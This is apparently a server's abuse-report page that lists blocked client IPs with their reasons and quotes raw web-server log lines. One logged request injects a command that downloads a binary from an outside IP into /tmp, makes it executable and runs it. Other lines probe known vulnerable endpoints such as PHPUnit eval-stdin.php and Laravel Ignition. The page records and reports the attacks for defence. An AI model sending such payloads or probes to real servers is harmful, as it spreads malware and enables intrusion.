[Security system triggered]
The client 198.98.59.61 was automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
The client 198.98.59.61 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400); Bad user agent;
show less
[Security system triggered]
The client 51.11.229.77 was automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
The client 51.11.229.77 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad user agent;
show less
[Security system triggered]
The client 23.146.241.158 was automatically blocked and reported.
Reason ...
show more[Security system triggered]
The client 23.146.241.158 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad user agent;
show less
[Security system triggered]
Client 113.131.201.8 was automatically blocked and reported.
Reasons: Di ...
show more[Security system triggered]
Client 113.131.201.8 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400); Bad user agent;
show less
[Security system triggered]
Client 89.248.165.163 was automatically blocked and reported.
Reasons: D ...
show more[Security system triggered]
Client 89.248.165.163 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad user agent;
show less
[Security system triggered]
Client 89.248.170.22 was automatically blocked and reported.
Reasons: Re ...
show more[Security system triggered]
Client 89.248.170.22 was automatically blocked and reported.
Reasons: Requests with prohibited methods; Bad user agent;
show less
[Security system triggered]
Client 104.223.100.210 was automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
Client 104.223.100.210 was automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain;
show less
[Security system triggered]
Client 185.213.154.234 has automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
Client 185.213.154.234 has automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400/444);
show less
[Security system triggered]
Client 192.241.216.144 has automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
Client 192.241.216.144 has automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400/444); Attempts to find the control panel; Bad user agent;
show less
[Security system triggered]
Client 111.7.96.158 has automatically blocked and reported.
Reasons: Dir ...
show more[Security system triggered]
Client 111.7.96.158 has automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400/444); Requests with prohibited methods;
show less
[Security system triggered]
Client 205.185.122.102 has automatically blocked and reported.
Reasons: ...
show more[Security system triggered]
Client 205.185.122.102 has automatically blocked and reported.
Reasons: Direct connection to IP, bypassing the domain; Bad requests (400/444); Attempts to find the control panel;
show less
Searched for the MySQL control panel. Connected to the IP bypassing the domain (most likely, a scrip ...
show moreSearched for the MySQL control panel. Connected to the IP bypassing the domain (most likely, a script).
show less
Attempt to upload virus software to the server
40.88.4.239 - - [30/Mar/2021:20:45:26 +0300] "GET /s ...
show moreAttempt to upload virus software to the server
40.88.4.239 - - [30/Mar/2021:20:45:26 +0300] "GET /shell?cd+/tmp;+wget+http:/\x5C/185.200.241.196/ldpto/Akitaskid.arm;+chmod+777+Akitaskid.arm;+./Akitaskid.arm Jaws.Selfrep;rm+-rf+Akitaskid.arm HTTP/1.1"
show less
It looks like an infected server. Similar requests were received several times later.
51.178.52.57 ...
show moreIt looks like an infected server. Similar requests were received several times later.
51.178.52.57 - - [02/Apr/2021:19:15:28 +0300] "POST /_ignition/execute-solution HTTP/1.1"
51.178.52.57 - - [02/Apr/2021:19:15:28 +0300] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
51.178.52.57 - - [02/Apr/2021:19:15:29 +0300] "GET /login HTTP/1.1"
51.178.52.57 - 8hYTSUFk [02/Apr/2021:19:15:29 +0300] "GET /manager/html HTTP/1.1"
51.178.52.57 - - [02/Apr/2021:19:15:29 +0300] "GET /wp-login.php HTTP/1.1" 444 0
show less